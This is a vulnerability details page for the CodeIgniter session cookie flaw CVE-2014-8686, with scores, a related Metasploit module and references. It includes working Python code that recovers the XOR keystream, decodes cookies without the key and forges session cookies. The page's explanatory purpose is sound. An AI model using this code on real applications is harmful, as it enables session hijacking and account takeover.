Vulnerability Details : CVE-2014-8686
Public exploit exists!
CodeIgniter before 2.2.0 makes it easier for attackers to decode session cookies by leveraging fallback to a custom XOR-based encryption scheme when the Mcrypt extension for PHP is not available.
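As an added illustration (this is not code from this page, from CodeIgniter, or from the Metasploit module listed below): a Python reconstruction of the XOR fallback in the CodeIgniter 2.1.x Encrypt library, followed by the known-plaintext recovery that lets an attacker read such cookies without the key. It assumes the library's default sha1 hash type (40 hex characters), the md5 step of Encrypt::get_key(), the base64 wrapping of Encrypt::encode(), and constructed session contents; the key and session values are made up for the example.

```python
# Added example, not CodeIgniter's own code: a reconstruction of the Mcrypt-less
# XOR fallback in CodeIgniter 2.1.x (Encrypt::_xor_encode/_xor_decode/_xor_merge)
# and the known-plaintext attack that makes the resulting cookies decodable.
import base64
import hashlib
import os
from typing import Optional, Tuple

HASH_LEN = 40           # assumption: default hash type sha1 -> 40 hex chars
PERIOD = HASH_LEN // 2  # effective keystream period (derived in fold() below)


def _hash(data: bytes) -> bytes:
    """Encrypt::hash() with the default sha1 type: hex digits, not raw bytes."""
    return hashlib.sha1(data).hexdigest().encode()


def get_key(encryption_key: bytes) -> bytes:
    """Encrypt::get_key(): the configured encryption_key is md5'd before use."""
    return hashlib.md5(encryption_key).hexdigest().encode()


def _xor_merge(data: bytes, key: bytes) -> bytes:
    """XOR every byte with hash(key), cycling through its 40 hex characters."""
    h = _hash(key)
    return bytes(b ^ h[i % len(h)] for i, b in enumerate(data))


def xor_encode(plaintext: bytes, key: bytes, rand: Optional[bytes] = None) -> bytes:
    """Each plaintext byte p_i becomes the pair (r_i, r_i ^ p_i), r_i taken
    from a hashed random string; the whole thing is then merged with hash(key)."""
    if rand is None:
        rand = _hash(os.urandom(32))  # CI builds this from mt_rand() output
    enc = bytearray()
    for i, p in enumerate(plaintext):
        r = rand[i % len(rand)]
        enc += bytes((r, r ^ p))
    return _xor_merge(bytes(enc), key)


def xor_decode(ciphertext: bytes, key: bytes) -> bytes:
    """Undo the merge, then XOR each pair back together."""
    s = _xor_merge(ciphertext, key)
    return bytes(s[i] ^ s[i + 1] for i in range(0, len(s) - 1, 2))


def encode_cookie(plaintext: bytes, encryption_key: bytes) -> str:
    return base64.b64encode(xor_encode(plaintext, get_key(encryption_key))).decode()


def decode_cookie(cookie: str, encryption_key: bytes) -> bytes:
    return xor_decode(base64.b64decode(cookie), get_key(encryption_key))


# ---- the attack ------------------------------------------------------------
# Folding each pair: c[2i] ^ c[2i+1] = (r_i ^ h[2i]) ^ (r_i ^ p_i ^ h[2i+1])
#                                    = p_i ^ (h[2i mod 40] ^ h[(2i+1) mod 40]).
# The random pad r_i cancels, leaving a plain repeating-key XOR whose 20-byte
# keystream k_i = h[2(i mod 20)] ^ h[2(i mod 20)+1] depends only on the key.

def fold(ciphertext: bytes) -> bytes:
    return bytes(ciphertext[i] ^ ciphertext[i + 1] for i in range(0, len(ciphertext) - 1, 2))


def recover_keystream(cookie: str, known_prefix: bytes) -> bytes:
    """PERIOD bytes of known plaintext yield the whole keystream, no key needed."""
    if len(known_prefix) < PERIOD:
        raise ValueError(f"need at least {PERIOD} known plaintext bytes")
    f = fold(base64.b64decode(cookie))
    return bytes(f[i] ^ known_prefix[i] for i in range(PERIOD))


def decode_without_key(cookie: str, keystream: bytes) -> bytes:
    f = fold(base64.b64decode(cookie))
    return bytes(b ^ keystream[i % PERIOD] for i, b in enumerate(f))


def forge_cookie(plaintext: bytes, keystream: bytes) -> str:
    """The decoder never checks r_i, so pairs (0, p_i ^ k_i) decode to p_i."""
    c = bytearray()
    for i, p in enumerate(plaintext):
        c += bytes((0, p ^ keystream[i % PERIOD]))
    return base64.b64encode(bytes(c)).decode()


# Constructed sample data (hypothetical key and sessions, not from any deployment).
SECRET_KEY = b"some-installed-app-key"
# A PHP-serialized CI 2.x session array: its first 29 bytes are fixed by the
# framework, more than the 20 known plaintext bytes the attack needs.
KNOWN_PREFIX = b'a:5:{s:10:"session_id";s:32:"'
SESSION_A = (KNOWN_PREFIX + b'0123456789abcdef0123456789abcdef";'
             b's:10:"ip_address";s:9:"127.0.0.1";s:10:"user_agent";s:7:"Mozilla";'
             b's:13:"last_activity";i:1420070400;s:7:"user_id";i:42;}')
SESSION_B = (KNOWN_PREFIX + b'fedcba9876543210fedcba9876543210";'
             b's:10:"ip_address";s:8:"10.0.0.5";s:10:"user_agent";s:4:"curl";'
             b's:13:"last_activity";i:1420070401;s:7:"user_id";i:1;}')


def demo() -> Tuple[bytes, bytes, bytes]:
    cookie_a = encode_cookie(SESSION_A, SECRET_KEY)
    cookie_b = encode_cookie(SESSION_B, SECRET_KEY)  # fresh random pad, same key
    ks = recover_keystream(cookie_a, KNOWN_PREFIX)    # learned from cookie A alone
    plain_b = decode_without_key(cookie_b, ks)        # reads cookie B outright
    forged = forge_cookie(b'a:1:{s:7:"user_id";i:1;}', ks)
    return plain_b, decode_cookie(forged, SECRET_KEY), ks


if __name__ == "__main__":
    plain_b, accepted, _ = demo()
    print(plain_b.decode())
    print(accepted.decode())
```

The keystream recovered from one cookie decodes every cookie issued under the same encryption_key, and because the decoder verifies nothing beyond the XOR, it also suffices to emit a cookie of chosen content. Note that the output of the fallback is indistinguishable from a Mcrypt-encrypted cookie from the outside, so on a release before 2.2.0 the practical check is `extension_loaded('mcrypt')` on the production host itself; 2.2.0 removed the fallback, as the vendor changelog referenced below records.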
Products affected by CVE-2014-8686
- cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2014-8686
EPSS score: 31.17% (probability of exploitation activity in the next 30 days)
EPSS percentile: ~96% (the proportion of vulnerabilities scored at or below this one)
Metasploit modules for CVE-2014-8686
- Seagate Business NAS Unauthenticated Remote Command Execution
  Disclosure Date: 2015-03-01
  First seen: 2020-04-26
  Module: exploit/linux/http/seagate_nas_php_exec_noauth
  Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the
CVSS scores for CVE-2014-8686
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen
---|---|---|---|---|---|---
5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N | 10.0 | 2.9 | NIST | 
9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 3.9 | 5.9 | NIST | 
CWE ids for CVE-2014-8686
- Assigned by: nvd@nist.gov (Primary)
References for CVE-2014-8686
- https://beyondbinary.io/articles/seagate-nas-rce/
  Beyond Binary - Advisory: Seagate NAS Remote Code Execution Vulnerability (Exploit; Third Party Advisory)
- https://codeigniter.com/userguide2/changelog.html
  Change Log : CodeIgniter User Guide (Vendor Advisory)
- http://packetstormsecurity.com/files/130609/Seagate-Business-NAS-Unauthenticated-Remote-Command-Execution.html
  Seagate Business NAS Unauthenticated Remote Command Execution ≈ Packet Storm (Third Party Advisory; VDB Entry)
- https://www.dionach.com/blog/codeigniter-session-decoding-vulnerability
  CodeIgniter Session Decoding Vulnerability | Dionach (Third Party Advisory)